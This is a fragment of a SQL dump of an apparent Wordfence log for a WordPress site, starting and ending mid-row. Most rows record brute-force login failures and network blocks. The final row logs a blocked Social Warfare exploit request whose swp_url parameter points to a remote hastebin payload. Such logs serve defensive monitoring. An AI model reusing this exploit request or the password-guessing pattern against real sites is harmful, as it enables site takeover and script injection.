Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6508,0.000000,1629467857.628556,'\0\0\0\0\0\0\0\0\0\0��:��>',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6509,0.000000,1629467889.603028,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6510,0.000000,1629467893.729481,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6511,0.000000,1629467897.347820,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6512,0.000000,1629467924.630072,'\0\0\0\0\0\0\0\0\0\0��|y�J',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6513,0.000000,1629467936.128188,'\0\0\0\0\0\0\0\0\0\0���`ː',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6514,0.000000,1629467951.562731,'\0\0\0\0\0\0\0\0\0\0��WyL�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6515,0.000000,1629467970.562317,'\0\0\0\0\0\0\0\0\0\0��|y�.',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6516,0.000000,1629467972.477161,'\0\0\0\0\0\0\0\0\0\0��]OR�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6517,0.000000,1629467977.679750,'\0\0\0\0\0\0\0\0\0\0��]OR�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6518,0.000000,1629467980.791938,'\0\0\0\0\0\0\0\0\0\0��]OR�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6519,0.000000,1629467996.027903,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6520,0.000000,1629467999.214915,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6521,0.000000,1629468002.248578,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6522,0.000000,1629468014.693920,'\0\0\0\0\0\0\0\0\0\0��g��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6523,0.000000,1629468017.098021,'\0\0\0\0\0\0\0\0\0\0��g��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6524,0.000000,1629468044.384953,'\0\0\0\0\0\0\0\0\0\0���e�f',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6525,0.000000,1629468056.192970,'\0\0\0\0\0\0\0\0\0\0�����\'',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6526,0.000000,1629468094.678066,'\0\0\0\0\0\0\0\0\0\0���a!�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6527,0.000000,1629468105.355788,'\0\0\0\0\0\0\0\0\0\0��|yU',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6528,0.000000,1629468107.696846,'\0\0\0\0\0\0\0\0\0\0��|yU',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6529,0.000000,1629468109.870430,'\0\0\0\0\0\0\0\0\0\0��|yU',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6530,0.000000,1629468139.850839,'\0\0\0\0\0\0\0\0\0\0���g�n',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6531,0.000000,1629468143.915834,'\0\0\0\0\0\0\0\0\0\0���g�n',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6532,0.000000,1629468147.586070,'\0\0\0\0\0\0\0\0\0\0���g�n',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6533,0.000000,1629468163.754799,'\0\0\0\0\0\0\0\0\0\0��:�u',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6534,0.000000,1629468168.850080,'\0\0\0\0\0\0\0\0\0\0��:�u',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6535,0.000000,1629468202.004686,'\0\0\0\0\0\0\0\0\0\0��|y�b',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6536,0.000000,1629468205.489007,'\0\0\0\0\0\0\0\0\0\0��|y�b',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6537,0.000000,1629468207.791487,'\0\0\0\0\0\0\0\0\0\0��|y�b',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6538,0.000000,1629468241.470567,'\0\0\0\0\0\0\0\0\0\0��|x��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6539,0.000000,1629468255.687685,'\0\0\0\0\0\0\0\0\0\0��sW�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6540,0.000000,1629468283.937817,'\0\0\0\0\0\0\0\0\0\0�����k',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6541,0.000000,1629468288.072514,'\0\0\0\0\0\0\0\0\0\0�����k',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6542,0.000000,1629468290.794519,'\0\0\0\0\0\0\0\0\0\0�����k',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6543,0.000000,1629468304.897157,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6544,0.000000,1629468308.852984,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6545,0.000000,1629468311.060633,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6546,0.000000,1629468337.930623,'\0\0\0\0\0\0\0\0\0\0���,�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6547,0.000000,1629468367.072383,'\0\0\0\0\0\0\0\0\0\0��)�M�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6548,0.000000,1629468370.554353,'\0\0\0\0\0\0\0\0\0\0��)�M�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6549,0.000000,1629468373.894509,'\0\0\0\0\0\0\0\0\0\0��)�M�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6550,0.000000,1629468387.317082,'\0\0\0\0\0\0\0\0\0\0��|yt�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6551,0.000000,1629468391.491017,'\0\0\0\0\0\0\0\0\0\0��|yt�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6552,0.000000,1629468394.741688,'\0\0\0\0\0\0\0\0\0\0��|yt�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6553,0.000000,1629468406.146309,'\0\0\0\0\0\0\0\0\0\0���a	)',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6554,0.000000,1629468410.173259,'\0\0\0\0\0\0\0\0\0\0���a	)',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6555,0.000000,1629468413.090518,'\0\0\0\0\0\0\0\0\0\0���a	)',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6556,0.000000,1629468427.513132,'\0\0\0\0\0\0\0\0\0\0��}�bn',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6557,0.000000,1629468431.538511,'\0\0\0\0\0\0\0\0\0\0��}�bn',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6558,0.000000,1629468433.984462,'\0\0\0\0\0\0\0\0\0\0��}�bn',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6559,0.000000,1629468453.069550,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6560,0.000000,1629468465.038145,'\0\0\0\0\0\0\0\0\0\0���e�f',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6561,0.000000,1629468480.603687,'\0\0\0\0\0\0\0\0\0\0��ed�l',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6562,0.000000,1629468500.347308,'\0\0\0\0\0\0\0\0\0\0��sW�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6563,0.000000,1629468532.322017,'\0\0\0\0\0\0\0\0\0\0��՝!�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6564,0.000000,1629468542.647725,'\0\0\0\0\0\0\0\0\0\0���a\n',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6565,0.000000,1629468556.434741,'\0\0\0\0\0\0\0\0\0\0��n�!�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6566,0.000000,1629468569.393553,'\0\0\0\0\0\0\0\0\0\0��=�r�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6567,0.000000,1629468575.379805,'\0\0\0\0\0\0\0\0\0\0��=�r�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6568,0.000000,1629468578.241540,'\0\0\0\0\0\0\0\0\0\0��=�r�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6569,0.000000,1629468596.699572,'\0\0\0\0\0\0\0\0\0\0��ʉ�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6570,0.000000,1629468607.435978,'\0\0\0\0\0\0\0\0\0\0���a*',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6571,0.000000,1629468620.419331,'\0\0\0\0\0\0\0\0\0\0��2Z',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6572,0.000000,1629468626.531076,'\0\0\0\0\0\0\0\0\0\0��2Z',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6573,0.000000,1629468638.255874,'\0\0\0\0\0\0\0\0\0\0���a�x',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6574,0.000000,1629468641.227015,'\0\0\0\0\0\0\0\0\0\0���a�x',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6575,0.000000,1629468643.351208,'\0\0\0\0\0\0\0\0\0\0���a�x',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6576,0.000000,1629468661.954595,'\0\0\0\0\0\0\0\0\0\0���z�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6577,0.000000,1629468675.213713,'\0\0\0\0\0\0\0\0\0\0��n���',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6578,0.000000,1629468689.712424,'\0\0\0\0\0\0\0\0\0\0���a!�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6579,0.000000,1629468694.951954,'\0\0\0\0\0\0\0\0\0\0���a!�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6580,0.000000,1629468697.206159,'\0\0\0\0\0\0\0\0\0\0���a!�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6581,0.000000,1629468714.351980,'\0\0\0\0\0\0\0\0\0\0��n�O',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6582,0.000000,1629468717.517141,'\0\0\0\0\0\0\0\0\0\0��n�O',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6583,0.000000,1629468719.755870,'\0\0\0\0\0\0\0\0\0\0��n�O',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6584,0.000000,1629468750.625898,'\0\0\0\0\0\0\0\0\0\0���ar',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6585,0.000000,1629468754.618443,'\0\0\0\0\0\0\0\0\0\0���ar',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6586,0.000000,1629468765.397800,'\0\0\0\0\0\0\0\0\0\0��[�{�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6587,0.000000,1629468777.072176,'\0\0\0\0\0\0\0\0\0\0��n��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6588,0.000000,1629468787.754837,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6589,0.000000,1629468816.477207,'\0\0\0\0\0\0\0\0\0\0��:�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6590,0.000000,1629470312.753220,'\0\0\0\0\0\0\0\0\0\0��ԯ�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(6591,0.000000,1629471839.388275,'\0\0\0\0\0\0\0\0\0\0��\"C��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6592,0.000000,1629473372.558803,'\0\0\0\0\0\0\0\0\0\0�����[',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(6593,0.000000,1629473689.586991,'\0\0\0\0\0\0\0\0\0\0����|',0,503,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6594,0.000000,1629474929.432308,'\0\0\0\0\0\0\0\0\0\0���n��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','loginFailValidUsername',NULL,NULL),(6595,0.000000,1629476470.495353,'\0\0\0\0\0\0\0\0\0\0���Z�_',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6596,0.000000,1629476960.338744,'\0\0\0\0\0\0\0\0\0\0����f�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6597,1629477621.146672,1629477620.520300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site 